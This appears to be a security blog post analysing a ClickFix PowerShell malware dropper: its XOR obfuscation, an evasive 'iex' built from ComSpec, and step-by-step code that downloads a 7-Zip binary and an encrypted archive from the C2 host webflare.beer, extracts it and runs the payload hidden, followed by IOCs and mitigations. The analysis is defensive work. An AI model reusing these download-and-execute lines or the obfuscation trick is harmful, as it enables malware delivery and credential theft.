ClickFIX Malware

#code #cybersecurity #infosec #security

Here's the complete breakdown of this malware:

Stage 1: Outer Wrapper (Obfuscation Layer)

The outer script uses three layers of evasion:

XOR obfuscation: The massive hex string ($x24) is XOR-decrypted using the key 5JZv8J9xz. Each byte is decoded by converting 2 hex chars to an integer, then XORing with the key character at position (i/2) % key_length.
Dynamic iex construction: Instead of writing iex literally, it builds it from the COMSPEC environment variable (C:\Windows\system32\cmd.exe):
- Index 4 → W
- Index 26 → e
- Index 25 → x
- Joined → iex (Invoke-Expression)
Execution via iex: .($env:ComSpec[4,26,25]-join'') $y25 evaluates to iex $y25, executing the decoded payload.

Stage 2: Decoded Payload (Dropper)

The decoded payload ($v7am6e) is a complete malware dropper:

Configuration

Variable	Value
`$g7`	`7z` (archive extension)
`$h8`	`2026` (password for the archive)

Execution Flow

Step 1 — Create temp workspace

$i9 = Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName())
New-Item -ItemType Directory -Path $i9 -Force | Out-Null

Step 2 — Download 7z.exe (decompressor)

$j10 = Join-Path $i9 ([System.IO.Path]::GetRandomFileName() + '.exe')
Invoke-WebRequest -Uri 'https://webflare.beer/api/7z.exe' -OutFile $j10

Downloads a legitimate 7-Zip binary from the C2 server at webflare.beer.

Step 3 — Download encrypted payload

$k11 = Join-Path $i9 ([System.IO.Path]::GetRandomFileName() + '.' + $g7)
Invoke-WebRequest -Uri 'https://webflare.beer/api/index.php?a=dl&token=...' -OutFile $k11

Downloads a password-protected 7z archive from the C2. The request mimics a reCAPTCHA callback with a fake referrer (mdwaktual.com). Retries up to 3 times with 2-second delays if it fails.

Step 4 — Extract with 7z

$o15 = @('x', '-y', '-p2026', '-o' + $n14, $k11)
& $j10 @o15 | Out-Null

Extracts the archive using 7-Zip with password 2026. If 7z.exe failed to download, it falls back to executing the archive directly.

Step 5 — Execute the final payload

$p16 = Get-ChildItem -Path $n14 -Filter *.exe -Recurse -File | Select-Object -First 1
$q17 = Get-ChildItem -Path $n14 -Filter *.msi -Recurse -File | Select-Object -First 1

It looks for either a .exe or .msi file inside the extracted archive, then executes it with Start-Process -WindowStyle Hidden.

Step 6 — Cleanup: Deletes the downloaded 7z archive and 7z.exe.

Stage 3: Final Stage

This is launched as a new hidden PowerShell process:

Start-Process -WindowStyle Hidden powershell -ArgumentList '-NoProfile','-WindowStyle','Hidden','-Command',$v7am6e

The final payload hosted at webflare.beer is unknown (encrypted archive not available), but based on the download infrastructure it's likely:

AsyncRAT, AgentTesla, RedLine Stealer, or similar infostealer/RAT
The reCAPTCHA-mimicking URI with cb=chrome&ref=https://mdwaktual.com suggests it targets credential harvesting via fake browser update / captcha themes

IOCs (Indicators of Compromise)

Type	Value
C2 Domain	`webflare.beer`
Download URL 1	`https://webflare.beer/api/7z.exe`
Download URL 2	`https://webflare.beer/api/index.php?a=dl&token=d123a6194156eab57f412223d4a8add891e6952bc1bcc89eea3cbf411b9da042&src=recaptcha&cb=chrome&ref=https://mdwaktual.com/&mode=recaptcha`
Archive Password	`2026`
Temp Directory Pattern	Randomly-named folder in `%TEMP%`
7z.exe hash	Unknown (fetched live from C2)
Referrer spoof	`mdwaktual.com`

Mitigation

Block the domain webflare.beer at firewall/DNS level
Block *.beer TLD if your org doesn't use it
Restrict PowerShell execution via Constrained Language Mode or AppLocker
Monitor powershell.exe spawning from another powershell.exe with -WindowStyle Hidden
Check %TEMP% for randomly-named directories containing 7z.exe or .7z files